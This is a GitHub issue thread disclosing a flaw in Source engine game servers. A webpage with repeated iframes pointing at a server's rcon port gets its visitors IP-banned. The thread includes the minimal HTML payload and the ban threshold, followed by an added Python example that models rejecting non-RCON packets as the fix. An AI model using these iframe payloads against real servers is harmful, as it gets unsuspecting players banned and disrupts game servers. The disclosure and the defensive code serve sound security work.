ValveSoftware / Source-1-Games

Source 1 based games such as TF2 and Counter-Strike: Source

[Exploit] Ban people from a server using a webpage #1464

Open Thordin opened 10 years ago

Thordin commented 10 years ago

I reported this exploit to a Valve employee about 2 months ago and it hasn't been fixed yet.

This exploit allows you to permanently ban people from a server until reboot simply by visiting a webpage. The server interprets these requests as an rcon request and permanently bans them.

To fix this, ignore packets that don't follow the rcon protocol.

<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
alfred-valve commented 10 years ago

Can you post some more details please, for example the whole HTML page in question and how exactly you cause the issue. I assume you are saying that the user loads this in their browser of choice?

Thordin commented 10 years ago

The person who used it against us had a webpage with a screenshot on it. Inside the html he embedded many iframe tags referring to our server.

You could probably also use img tags but the person who used this against us used iframe tags.

This is probably the minimal webpage needed. I think 3 is the minimum required to trigger an rcon ban but it could be more depending on your settings.

<html>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
</html>
It-s-Me commented 10 years ago

You also need to include http:// before the ip:port. Such as: <iframe src="http://ip:port"></iframe>

I tested this, as well, by creating an html file with the line above repeated 6 times with my server ip:port, which successfully IP banned me. It usually takes 6 times because the default for sv_rcon_minfailures is set to 5.

You can also simply open up your web browser and put in http://ip:port, then hit refresh 5 times and get IP banned.
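The fix Thordin proposes (ignore packets that don't follow the rcon protocol) and the sv_rcon_minfailures threshold It-s-Me describes can be shown together as a small server-side model. The following is an added example, not code from the Source engine or from anyone in this thread: it validates the documented Source RCON framing (little-endian int32 size, request id and type, then a NUL-terminated body plus a trailing NUL) before anything is counted as a failed authentication, so a browser's HTTP request arriving on the rcon port is dropped instead of pushing the client toward a ban. The `RconAuthGuard` class, the `simulate` helper, the password and the client address are constructed for the illustration; the real engine's time window and ban duration are left out.

```python
import struct

# Source RCON packet types (documented wire protocol, little-endian int32 fields).
SERVERDATA_AUTH = 3
SERVERDATA_EXECCOMMAND = 2
SERVERDATA_RESPONSE_VALUE = 0

MIN_BODY_FRAME = 10     # id(4) + type(4) + body terminator(1) + trailing NUL(1)
MAX_PACKET_SIZE = 4096  # larger RCON packets are rejected by the engine


def parse_rcon_packet(data: bytes):
    """Return (request_id, packet_type, body) for a well-formed client RCON
    packet, or None when the bytes are not RCON at all (e.g. an HTTP request)."""
    if len(data) < 4 + MIN_BODY_FRAME:
        return None
    (size,) = struct.unpack_from("<i", data, 0)
    # The size field counts everything after itself and must match what arrived.
    if size < MIN_BODY_FRAME or size > MAX_PACKET_SIZE or size != len(data) - 4:
        return None
    request_id, packet_type = struct.unpack_from("<ii", data, 4)
    if packet_type not in (SERVERDATA_AUTH, SERVERDATA_EXECCOMMAND, SERVERDATA_RESPONSE_VALUE):
        return None
    payload = data[12:]
    # Body is a NUL-terminated string followed by one more NUL (the empty string).
    if payload[-2:] != b"\x00\x00" or b"\x00" in payload[:-2]:
        return None
    return request_id, packet_type, payload[:-2]


def build_rcon_packet(request_id: int, packet_type: int, body: bytes) -> bytes:
    """Encode a packet in the same framing; used here only to construct test input."""
    frame = struct.pack("<ii", request_id, packet_type) + body + b"\x00\x00"
    return struct.pack("<i", len(frame)) + frame


class RconAuthGuard:
    """Hypothetical failed-auth counter: only genuine SERVERDATA_AUTH packets
    carrying a wrong password count toward the ban threshold."""

    def __init__(self, password: bytes, min_failures: int = 5):
        self.password = password
        self.min_failures = min_failures  # mirrors the sv_rcon_minfailures default of 5
        self.failures = {}                # client_ip -> consecutive wrong passwords
        self.banned = set()

    def handle(self, client_ip: str, data: bytes) -> str:
        if client_ip in self.banned:
            return "banned"
        parsed = parse_rcon_packet(data)
        if parsed is None:
            # Not RCON framing at all: drop it and never count it as an auth failure.
            return "dropped"
        _, packet_type, body = parsed
        if packet_type != SERVERDATA_AUTH:
            return "ignored"  # a command before authentication is not a failed login
        if body == self.password:
            self.failures.pop(client_ip, None)
            return "authenticated"
        count = self.failures.get(client_ip, 0) + 1
        self.failures[client_ip] = count
        if count > self.min_failures:  # the sixth wrong password trips the ban
            self.banned.add(client_ip)
            return "banned"
        return "auth_failed"


# Constructed sample input: roughly what a browser sends when an
# <iframe src="http://ip:27015"> loads. The leading bytes "GET " read as a size
# field far above MAX_PACKET_SIZE, so the packet never reaches the auth counter.
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: 1.2.3.4:27015\r\nConnection: keep-alive\r\n\r\n"


def simulate(packets, client_ip="203.0.113.7", min_failures=5):
    """Feed packets from one client through the guard; return outcomes and ban state."""
    guard = RconAuthGuard(password=b"correct-horse", min_failures=min_failures)
    results = [guard.handle(client_ip, p) for p in packets]
    return results, client_ip in guard.banned


if __name__ == "__main__":
    # Six page loads from a browser: every request is dropped, no ban.
    print(simulate([HTTP_REQUEST] * 6))
    # Six real RCON auth attempts with the wrong password: banned on the sixth.
    bad_auth = build_rcon_packet(1, SERVERDATA_AUTH, b"wrong-password")
    print(simulate([bad_auth] * 6))
```

The check that matters is the size field: in a real RCON packet it is a small little-endian integer equal to the remaining length, whereas the first four bytes of any HTTP method line decode to a value in the hundreds of millions. Validating that, plus the type field and the double NUL terminator, before touching the failure counter is what turns the iframe trick into harmless dropped traffic.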